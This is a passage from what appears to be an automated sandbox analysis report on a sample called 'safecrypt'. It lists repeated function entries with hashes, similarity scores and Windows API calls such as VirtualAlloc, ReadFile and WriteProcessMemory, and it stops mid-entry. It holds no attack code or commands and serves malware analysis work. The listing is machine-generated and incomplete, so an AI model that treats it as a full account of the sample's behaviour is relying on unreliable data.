                    • Instruction Fuzzy Hash: 0B418675800384DFE720DFA4DD45AAABBB8FB09710F20055FF541972A1EBB45881CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID: U$f
                    • API String ID: 2738559852-3222212738
                    • Opcode ID: 363cdfcf4f9ed0e7e83d16517b91efe320dc7ba137195d6f91fac9ff9ab5755e
                    • Instruction ID: 308f1fb89a0c436d482d8e331162b6587e85c434b4a3f956ddb829e2dff48304
                    • Opcode Fuzzy Hash: 363cdfcf4f9ed0e7e83d16517b91efe320dc7ba137195d6f91fac9ff9ab5755e
                    • Instruction Fuzzy Hash: 3F510375A146149FDF29AA64CC81B79B6B5FB82304F0496EDD00BEB240DA749E03CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID: U$f
                    • API String ID: 2591292051-3222212738
                    • Opcode ID: cbd23944fa6dac052ea3826d733f5c9681578b518551f3281ed63a448b419184
                    • Instruction ID: 8ad274985ee827aacd45b419f9e6f3990474a718dc5b136f203922e26df532a7
                    • Opcode Fuzzy Hash: cbd23944fa6dac052ea3826d733f5c9681578b518551f3281ed63a448b419184
                    • Instruction Fuzzy Hash: 31510175E046149FEF1AEA54CC81BB9B6B1FB86304F0547A8D00FEB240DA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID: U$f
                    • API String ID: 2591292051-3222212738
                    • Opcode ID: 1672dd24bb482af518c7ed726df05ca0bd58107dd05941ded8a85d3e04d6d6ed
                    • Instruction ID: 2720708ed4459e39f373017ac9847f41524f2408a8cefa3e76bc656080bdcd81
                    • Opcode Fuzzy Hash: 1672dd24bb482af518c7ed726df05ca0bd58107dd05941ded8a85d3e04d6d6ed
                    • Instruction Fuzzy Hash: 0351F375E046149FEB1AEA64CC81BBDB6B1FB96304F0556E8D00FEB240DA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                      • Part of subcall function 026815C4: VirtualAlloc.KERNELBASE ref: 02681643
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: 532070062cf11b9904d3a9db09fd8773f3dc478adfd5a9ce6003f0dfcfe5d1dd
                    • Instruction ID: 0ddfbda31d98407bbdd03907b7022c0b63ad7738c84be86681da42766da5e534
                    • Opcode Fuzzy Hash: 532070062cf11b9904d3a9db09fd8773f3dc478adfd5a9ce6003f0dfcfe5d1dd
                    • Instruction Fuzzy Hash: 7451F476E046149FEB19EA54CC81BBDB6B1FB86304F0556E8D00FEB244DA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                      • Part of subcall function 026815C4: VirtualAlloc.KERNELBASE ref: 02681643
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: 4853ab38e3ee6ab3172fa8a93713d0e47700ea2fba302bc6369f40e7867e9981
                    • Instruction ID: c69d99242ffc5574ba1304ec17a028d00740450169d642c8b8d7ccc22659f678
                    • Opcode Fuzzy Hash: 4853ab38e3ee6ab3172fa8a93713d0e47700ea2fba302bc6369f40e7867e9981
                    • Instruction Fuzzy Hash: 0541F276E046149FEB29EA54CC81BBDB6B1FB96304F0556A8D00FFB240DA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                      • Part of subcall function 026815C4: VirtualAlloc.KERNELBASE ref: 02681643
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: d0931d3c0a29b7f7d1ee63a1d07ef245cda2e46c2bbe9825bb633b5d00c70897
                    • Instruction ID: be957c4a8b2db7020012dce5195cecc1c1cd58f0f23423c0de0a7165b45cd537
                    • Opcode Fuzzy Hash: d0931d3c0a29b7f7d1ee63a1d07ef245cda2e46c2bbe9825bb633b5d00c70897
                    • Instruction Fuzzy Hash: 2E41E176E446248FDB19EE54CC81BADB6B1FB45304F4546A8C10EFB240CA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                      • Part of subcall function 026815C4: VirtualAlloc.KERNELBASE ref: 02681643
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: 17b0c341b52739a790c545d3b2fd629092981d63857a88dcb1ee279f33b8d765
                    • Instruction ID: 971b80ea75538af22df1a4481893eef9398060e712ccd9194cdb76612b532cf4
                    • Opcode Fuzzy Hash: 17b0c341b52739a790c545d3b2fd629092981d63857a88dcb1ee279f33b8d765
                    • Instruction Fuzzy Hash: A941D076E446248FDB19EE68CC81BADB6B1FB45304F0556A9D10EFB240CA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: b820873df2fcea4a6e708b8f9a5522c674a9895d130da8e17574ea9c0984405b
                    • Instruction ID: 517ee47ae509b7a440cbf16edc0f01a5a218b85a0db8613538068d57f2d20751
                    • Opcode Fuzzy Hash: b820873df2fcea4a6e708b8f9a5522c674a9895d130da8e17574ea9c0984405b
                    • Instruction Fuzzy Hash: 2D517931D2C686EDFB2DB7208C12B793159FB82705F04DB9DE507A9181EE784A0BC912
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID: read
                    • API String ID: 621844428-2555855207
                    • Opcode ID: cb6bd99a343ba0c5f25fd0ccd8ce41c5f4a862fcf58d9a64fa7457bc24e33bc0
                    • Instruction ID: ba1f49a18759e26cb5c659a7d68b440aac49faa93820bee3bb5a00006ccd0dba
                    • Opcode Fuzzy Hash: cb6bd99a343ba0c5f25fd0ccd8ce41c5f4a862fcf58d9a64fa7457bc24e33bc0
                    • Instruction Fuzzy Hash: 9FF02E3066C582ADEB1EB360DC31938348AAB80B09B05DB2DA803D9182EE2889078432
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID: read
                    • API String ID: 621844428-2555855207
                    • Opcode ID: c55a1e3579fd569a3a4676985bf2f89f8d330299d34ffc2bbc19bbe4e4652b72
                    • Instruction ID: 1f3efae241e841c1ed4a08b6b61563367f829834833b53b390bce0ce072c07d8
                    • Opcode Fuzzy Hash: c55a1e3579fd569a3a4676985bf2f89f8d330299d34ffc2bbc19bbe4e4652b72
                    • Instruction Fuzzy Hash: AFF0E57166D582A9BB1E77608C31C39348ABB80B19744DB0DEC03C9182FD3805478836
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: m
                    • API String ID: 0-3775001192
                    • Opcode ID: 22f51a0c6e4f82a2a73faf25d516c2bad06a7d5efb6946187ae1608bb3eb2431
                    • Instruction ID: 3e42be39baee66a033e215acebf77d45c1a7efbb23908b79d6853d6fde7494cb
                    • Opcode Fuzzy Hash: 22f51a0c6e4f82a2a73faf25d516c2bad06a7d5efb6946187ae1608bb3eb2431
                    • Instruction Fuzzy Hash: A4513636918501DDEB09FBA08D51B3D7AA6FB91708F05EF1DD003AB152EE75490ECB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID: m
                    • API String ID: 2538663250-3775001192
                    • Opcode ID: 516fedfe359e9bc17fdc314171fedff6de38101870687e966c8db859eec00c60
                    • Instruction ID: ef04c6af3df162024378536914f448b6731e1ebf0f418d961db9ebc75ac47510
                    • Opcode Fuzzy Hash: 516fedfe359e9bc17fdc314171fedff6de38101870687e966c8db859eec00c60
                    • Instruction Fuzzy Hash: A0515736918601DDEB0DFBA08D41B3D7AAAFB81708F05EF1DD003AB152EE74450ECA52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID: m
                    • API String ID: 2538663250-3775001192
                    • Opcode ID: cd1b1c505157a8ba16f0de916322fb71060366f9898df66083f292515782007f
                    • Instruction ID: 294a06b7c2f42b2da7d26637a2ecebbb046a3159057700af5dfa924f3afd49a8
                    • Opcode Fuzzy Hash: cd1b1c505157a8ba16f0de916322fb71060366f9898df66083f292515782007f
                    • Instruction Fuzzy Hash: 61413836D18601DDEB09FBA08D41B397AA9FB51708F05EF1ED003AB152EE75450FCA56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 557cdcc39c23c8639c6a724c4ccfcc95f9922060c4b41ae0de32f6856295eeb9
                    • Instruction ID: f606bb15005de80758e07364992b85a269a3c0da1830b4d3f4dd10a48b37e180
                    • Opcode Fuzzy Hash: 557cdcc39c23c8639c6a724c4ccfcc95f9922060c4b41ae0de32f6856295eeb9
                    • Instruction Fuzzy Hash: A9316B71A28145AFEF2E77204C51E793A9AFBC3705F0497CDE04BD9142EE340A478D12
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 2345ff6e8315cfd2208d5671bc11a5bcfb8dafb5c5efe15de6b2c50965d4fb6d
                    • Instruction ID: 48b51f6b9197fdb5464739f1f4d1233fb94cbd13758df2cd20fb84a0cb43e203
                    • Opcode Fuzzy Hash: 2345ff6e8315cfd2208d5671bc11a5bcfb8dafb5c5efe15de6b2c50965d4fb6d
                    • Instruction Fuzzy Hash: E6314665A28546AFEF2E77204C91E797A5EFBC3705F04A7CDE04BD9182EE350A478D02
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 6bd592971602314f8097fbff9fa399dad12e58fc6d5e572a2e8fff8a3c20566f
                    • Instruction ID: b80c269b4a50219a69a78a719ad4ea614d72bf321454c3c13360aec4afa88531
                    • Opcode Fuzzy Hash: 6bd592971602314f8097fbff9fa399dad12e58fc6d5e572a2e8fff8a3c20566f
                    • Instruction Fuzzy Hash: 73316765928146AFEF2AB7304C91D783A5EEBC3304F04A7CCA04BD4142EE350A47CD42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 4888ca9778e5dd17e4a144d2a959001da2cb10f22221b03b64b5fbbbd99a0110
                    • Instruction ID: abc1de1712d73a22ba8009459642ca94e70f3e8c8c84822ef3be7305cb5a828e
                    • Opcode Fuzzy Hash: 4888ca9778e5dd17e4a144d2a959001da2cb10f22221b03b64b5fbbbd99a0110
                    • Instruction Fuzzy Hash: 73217676D241159FEF2BBB308C51AB97AAAEBC3705F04A7CD904AD5142EE344B038D42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                      • Part of subcall function 026812FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 4a9d0029bf77a45e0f1f56a039a75d53bdcb41ff4d69050af763e70dfa8184b6
                    • Instruction ID: 70f273c991ccc1b5cdadd6679b33e753f43b6b959606cd52f41bc35914185b3a
                    • Opcode Fuzzy Hash: 4a9d0029bf77a45e0f1f56a039a75d53bdcb41ff4d69050af763e70dfa8184b6
                    • Instruction Fuzzy Hash: AC215565E28555AFEF2EB7204C52D797AAEEBC3704F04A7CCA04BD8142EE750B078946
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                      • Part of subcall function 026812FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: f58949bd25e95dea7aed7e68cc49ba356eaf0c8cab9df56d26ca38ebbcbf4dea
                    • Instruction ID: 5662f932b855ce2eb2b061bc597bf5cac7f88792421074eeb6b826bf09d4389d
                    • Opcode Fuzzy Hash: f58949bd25e95dea7aed7e68cc49ba356eaf0c8cab9df56d26ca38ebbcbf4dea
                    • Instruction Fuzzy Hash: F6214465E28515AFEF2AB7204C52E783A9EEBC3304F04A7CCA04BD8142EE750B078846
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                      • Part of subcall function 026812FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 2a603f0e1d2de1d0b3868fffa6be2bc5e14fdd64d552faa053dd15ac46bd165e
                    • Instruction ID: 5511743a21db2813ec0b13b77229cbba71aa5c24501df3a0d708ca954ead2b3b
                    • Opcode Fuzzy Hash: 2a603f0e1d2de1d0b3868fffa6be2bc5e14fdd64d552faa053dd15ac46bd165e
                    • Instruction Fuzzy Hash: 492146759241559FDF2E7B308C42A787A6AEBC3704F04A7CD904BD9542DE350B078942
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                      • Part of subcall function 026812FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 747cbf19506efbab8eccc3a2b0cc829c130a30676cb9ada8116f90b52f7eea42
                    • Instruction ID: 5ff2b56ad17501af316d1d41cc6fb3a1f4eecba168080fe102616237a4c3b7be
                    • Opcode Fuzzy Hash: 747cbf19506efbab8eccc3a2b0cc829c130a30676cb9ada8116f90b52f7eea42
                    • Instruction Fuzzy Hash: E52135759241559FDF2ABB308C52A787A6EEBC3304F04A7CD904BD9142DE750B078942
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26960fc846f8da6b10e223ccdbd21484f3497de6032a972b72585f5af6b37238
                    • Instruction ID: f11328a6a3e51ec69a8322b0b95cf842df8c69827cec18fef4f36641b1d3220b
                    • Opcode Fuzzy Hash: 26960fc846f8da6b10e223ccdbd21484f3497de6032a972b72585f5af6b37238
                    • Instruction Fuzzy Hash: AF514731D2C586EDFB2EB7704C12B79364ABB82B05F049B9DE507A9181EEB4460BC916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 93f14e04f7cf3b6f39ad2e16ec220aee6291f99485a428cea0333de025a3d837
                    • Instruction ID: 71f888218a1b0ac04c18a30eb951d4c560174e9181e2ab38665ab728f1d05319
                    • Opcode Fuzzy Hash: 93f14e04f7cf3b6f39ad2e16ec220aee6291f99485a428cea0333de025a3d837
                    • Instruction Fuzzy Hash: 1E517C31D2C586EDFB2EB7604C12F793149FB82B05F00DB9DE50BA9181EE740607C916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5ab466f345adeb8652944d531a55bcdf57d637b4736094779ea606d8dea9808e
                    • Instruction ID: 7d9a4af4e34a760e7a6cdf72ccca4e4a29a5b85d3027844e371b0372e0b88c24
                    • Opcode Fuzzy Hash: 5ab466f345adeb8652944d531a55bcdf57d637b4736094779ea606d8dea9808e
                    • Instruction Fuzzy Hash: 8F418D71D2C586EDFB2EB7704C12E79354AFB82B05F04DB9CE50BA9181EE740607C916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5489a443619db349fb6b5d7e73b9b035e751180253f17c10069bf35945666b10
                    • Instruction ID: 32edb0c105a037b7009f4d7103a1ab89f1e69fd18f5d56d741a8e21e672e4ebf
                    • Opcode Fuzzy Hash: 5489a443619db349fb6b5d7e73b9b035e751180253f17c10069bf35945666b10
                    • Instruction Fuzzy Hash: F5414931D2C586EDFB2EB7704C12E79365AFB82705F04DB9DE50BA9181EEB4060BC916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a35d9f93ac0131c96b6d56ca76a6072dc321c13d0cccd9dba53a695bc5bb0926
                    • Instruction ID: 5d7a9e187fe3b17f6b2e8b17936a75bc6275b75a1c720d17e7a750419df9fb51
                    • Opcode Fuzzy Hash: a35d9f93ac0131c96b6d56ca76a6072dc321c13d0cccd9dba53a695bc5bb0926
                    • Instruction Fuzzy Hash: F3417C31D1C586EDFB2EB7704C02E79365AFB83B05F049B9DE50BA9081EE740607C916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 04a73eaf2ff404960f5eaca17fdd77c68b7261e0e16dc6fac4e14b75259584c4
                    • Instruction ID: d29fedc83deb2e5f8aa2c9262c00dcaacac19e165fb2f986529920b2594a8a57
                    • Opcode Fuzzy Hash: 04a73eaf2ff404960f5eaca17fdd77c68b7261e0e16dc6fac4e14b75259584c4
                    • Instruction Fuzzy Hash: 63416831D1C586EDFB2EB7704C12E79365AFB82705F00AB9DE50BA9081EEB40607C916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e1f44333333c3b3db287a12a561cbdf059bd621d2cb28150a4d4097a54772a1
                    • Instruction ID: b05f13086a4501680181d944c324d0fc59dc92c9ea7ae092afb53666bf848051
                    • Opcode Fuzzy Hash: 9e1f44333333c3b3db287a12a561cbdf059bd621d2cb28150a4d4097a54772a1
                    • Instruction Fuzzy Hash: 72414831D18296DDEB2EB7704C12B793259EB82B05F049B9DE50BB90C1EEB40607C916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 11ddbe8b0d2afa93fd9251e9774ee83570d27912607ef50639023ae84ffb9c1a
                    • Instruction ID: 272980a922c485effb28a42bfeeb19a8c7cff81fbf5e99b4146709204dc7c2de
                    • Opcode Fuzzy Hash: 11ddbe8b0d2afa93fd9251e9774ee83570d27912607ef50639023ae84ffb9c1a
                    • Instruction Fuzzy Hash: F6415831D18296DDEB2EB7708C12B793259EB82B05F00AB9DE50BB90C1EEB40607C916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 740f051c4553bd70d0e1206a5e4f77d05feac7c322ab29687fcfdd5c5b094020
                    • Instruction ID: b09c75e3d8a408587f1015c1dc66b44586b624411fff51b4c797175945f54e40
                    • Opcode Fuzzy Hash: 740f051c4553bd70d0e1206a5e4f77d05feac7c322ab29687fcfdd5c5b094020
                    • Instruction Fuzzy Hash: AE314632918512AEEF1F77608C15F3D75AABB43B05F445BDCE00B95182EFB44603CA65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: f360cb25ee24762f1a72c315db08375b2e1e1844ce2c11367e3e64feb230cba2
                    • Instruction ID: d742bff999bf362860102ade4cd1e174f67f98cef9be22f9344b681575dea13d
                    • Opcode Fuzzy Hash: f360cb25ee24762f1a72c315db08375b2e1e1844ce2c11367e3e64feb230cba2
                    • Instruction Fuzzy Hash: 0A315731A9C541FDEB1EB6B18D12A3D3946EB82705F04DF2DD043A7052EE31090FCAA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 03a8a0e5359804c419903552202bc81913591781f27f36925624dcb1d3500a26
                    • Instruction ID: 0e42c976667f4ab1694c00cbece50c79d0e4436c9b2e258d945c8b26567a7dfb
                    • Opcode Fuzzy Hash: 03a8a0e5359804c419903552202bc81913591781f27f36925624dcb1d3500a26
                    • Instruction Fuzzy Hash: CA313873518512AEEB1F73608C19E3A359ABB83B05F445BDDE00BD9182FEA44503C9A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
